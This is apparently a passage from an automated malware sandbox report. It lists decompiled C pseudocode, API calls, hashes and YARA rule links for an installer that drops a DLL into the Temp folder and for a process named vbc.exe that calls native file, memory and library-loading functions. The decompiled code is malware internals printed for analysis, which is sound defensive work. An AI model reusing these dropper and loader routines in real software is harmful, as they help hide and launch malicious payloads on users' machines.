                                                • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                0x00404de0
                                                0x00404e05
                                                0x00404e25
                                                0x00404e28
                                                0x00404e2b
                                                0x00404e42
                                                0x00404e48
                                                0x00404e4f
                                                0x00404e56
                                                0x00404e5d
                                                0x00404e62
                                                0x00404e68
                                                0x00000000
                                                0x00404e78
                                                0x00404e12
                                                0x00404e65
                                                0x00404e65
                                                0x00000000
                                                0x00404e65
                                                0x00404e1e
                                                0x00404e20
                                                0x00000000
                                                0x00404e20
                                                0x00404de6
                                                0x00000000
                                                0x00000000
                                                0x00404ded
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404E0A
                                                • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                                  • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                0x004024f1
                                                0x004024f1
                                                0x004024f4
                                                0x0040250f
                                                0x004024f6
                                                0x004024f8
                                                0x004024fd
                                                0x00402504
                                                0x00402516
                                                0x0040268f
                                                0x0040268f
                                                0x0040251c
                                                0x0040252e
                                                0x004015a6
                                                0x004015a8
                                                0x00000000
                                                0x004015ae
                                                0x004015a8
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll,00000000,?), ref: 0040252E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll, xrefs: 004024FD, 00402522
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileWritelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll
                                                • API String ID: 427699356-3221423330
                                                • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                0x00405401
                                                0x0040541d
                                                0x00405425
                                                0x0040542a
                                                0x00000000
                                                0x00405430
                                                0x00405434

                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                • CloseHandle.KERNEL32(?), ref: 0040542A
                                                Strings
                                                • Error launching installer, xrefs: 0040540B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                0x00403557
                                                0x0040355f
                                                0x00403566
                                                0x00403569
                                                0x00403569
                                                0x0040356b
                                                0x00403570
                                                0x00403577
                                                0x0040357d
                                                0x00403581
                                                0x00403582
                                                0x0040358a

                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                • GlobalFree.KERNEL32(?), ref: 00403577
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                0x004056d3
                                                0x004056dd
                                                0x004056df
                                                0x004056e6
                                                0x004056ee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004056ee
                                                0x004056f0
                                                0x004056f5

                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC1,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004056D8
                                                • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\Public
                                                • API String ID: 2709904686-2272764151
                                                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                0x004057f0
                                                0x004057f2
                                                0x0040581a
                                                0x004057ff
                                                0x00405804
                                                0x0040580f
                                                0x00000000
                                                0x0040582c
                                                0x00405818
                                                0x00405818
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                • CharNextA.USER32(00000000), ref: 00405812
                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: vbc.exe PID: 2072 Parent PID: 1292 vbc.exeCOMMON

                                                Executed Functions

                                                Function 00418660, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E004191B0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}





                                                0x00418663
                                                0x0041866f
                                                0x00418677
                                                0x0041867c
                                                0x00418682
                                                0x0041869d
                                                0x004186a5
                                                0x004186a9

                                                APIs
                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: !:A$b=A$b=A
                                                • API String ID: 2738559852-704622139
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00409B30(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t24;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AF40( &_v12,  &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B360(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5E0(_t24, _t31,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004196F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}















                                                0x00409b4c
                                                0x00409b4f
                                                0x00409b54
                                                0x00409b59
                                                0x00409b63
                                                0x00409b68
                                                0x00409b6b
                                                0x00409b6d
                                                0x00409b75
                                                0x00409b7a
                                                0x00409b7a
                                                0x00409b81
                                                0x00409b89
                                                0x00409b8c
                                                0x00409b8e
                                                0x00409ba2
                                                0x00000000
                                                0x00409ba4
                                                0x00409baa
                                                0x00409b5e
                                                0x00409b5e
                                                0x00409b5e

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004185B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                0x004185bf
                                                0x004185c7
                                                0x004185fd
                                                0x00418601

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                0x0041879f
                                                0x004187a7
                                                0x004187c9
                                                0x004187cd

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004186E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004186E0(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191B0(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                0x004186e3
                                                0x004186e6
                                                0x004186ef
                                                0x004186f7
                                                0x00418705
                                                0x00418709

                                                APIs
                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00910048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00910078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
